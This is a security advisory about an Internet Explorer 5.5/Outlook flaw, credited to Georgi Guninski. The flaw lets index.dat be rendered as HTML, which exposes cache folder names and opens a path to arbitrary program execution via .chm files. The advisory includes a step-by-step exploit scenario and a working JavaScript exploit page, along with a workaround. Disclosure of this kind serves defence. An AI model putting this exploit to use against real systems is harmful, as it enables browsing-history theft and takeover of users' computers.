|
|
|
|
| |
There is a security vulnerability in IE 5.5 and Outlook that enables malicious attackers to execute arbitrarily programs by sending an e-mail containing the tag OBJECT TYPE="text/html". This security hole also enables remote users to parse the index.dat file by revealing the location of temporary Internet files folder. This may lead to taking full control over user's computer.
Note: This is completely different issue from the advisory "IE 5.x/Outlook allows executing arbitrary programs using .chm files and temporary internet files folder" though both share some common properties. |
| |
Credit:
The information has been provided by Georgi Guninski.
|
| |
Vulnerable systems:
IE 5.5 probably 5.x and Outlook/Outlook Express
Background:
If one can inject a file to the user's local disk and know its exact location, it is possible to execute arbitrary programs in at least two ways:
1) Using the window.showHelp() function (example: window.showHelp("c:\\dir\\hostile.chm"))
2) Using an <OBJECT> tag (for example: <OBJECT CLASSID="clsid:000000000-0000-0000-00000-000000000002" CODEBASE="C:\DIR\HOSTILE.EXE">)
Therefore, the only question that arises is how to inject a specified file on user's disk. One good way is to use the Temporary Internet Files Folder that contains cached documents and files. The only problem with this is that there are several subfolders with random names. There is, however, a special file called "index.dat" which is something like a catalog or registry that contains all visited URLs as well as more useful information: the names of the random folders (in the beginning of each filename).
A possible exploit scenario:
1) Inject JavaScript to index.dat by: window.open("http://example.com/index.html?<SCRIPT>JSCODE</SCRIPT>"). The JavaScript is executed in index.dat and has access to its content, which allows us to find the random directory names
2) Parse / render index.dat by: <OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>
3) After the Temporary Internet Files Folders are known inject for example .chm files by: <OBJECT DATA="chm1.chm" TYPE="text/html"></OBJECT>
4) Do window.showHelp("FOUNDRANDOMDIRECTORY\\chm1[1].chm");
The presence of the random temporary Internet Files folders in index.dat is very dangerous - it means that every Cross Frame Security vulnerability or vulnerability that reads local files may lead to executing arbitrary programs.
Exploit:
--------parsedat.html------------------------------------------------
This demo is for Windows 9x - you must modify the source for Win2K. You may need to wait a few minutes if you have slow computer. If you have Pentium 500 or better or use Win2K probably much less. It is expected a window with location "about:blank" to be opened containing index.dat - the file where the random names of temporary internet files directories are kept (they are random names in the beginning of the window) and the list of all visited URLs among other stuff. Once the temporary internet files directories are know it is possible to execute arbitrary programs thru cached files and showHelp() or OBJECT CODEBASE="...". If you don't see a window with location "about:blank" and content of index.dat close IE and visit the page again.
<SCRIPT>
b=window.open("http://www.guninski.com/empty2.html?<SCRIPT>a=window.open();a.document.body.innerHTML=escape(document.body.innerHTML)</"+"SCRIPT>");
s='<OBJECT DATA="file://C:/WINDOWS/Temporary Internet
Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200
HEIGHT=200></OBJECT>';
file://s='<OBJECT DATA="file://C:/Documents and Settings/Administrator/Local
Settings/Temporary Internet Files/Content.IE5/index.dat"
TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>';
// ^^^ This is for Win2K ------------you must change "Administrator" to
the actual user name
setTimeout("document.writeln(s)",5000);
</SCRIPT>
---------------------------------------------------------------------
Workaround:
Disable Active Scripting and move the location of the Temporary Internet Files Folder to an unpredicatable location.
Demonstration:
The following demonstration opens index.dat that contains the Temporary Internet Files Folders and the list of all visited URLs:
http://www.guninski.com/parsedat.html
|
|
|
|
|
|
|
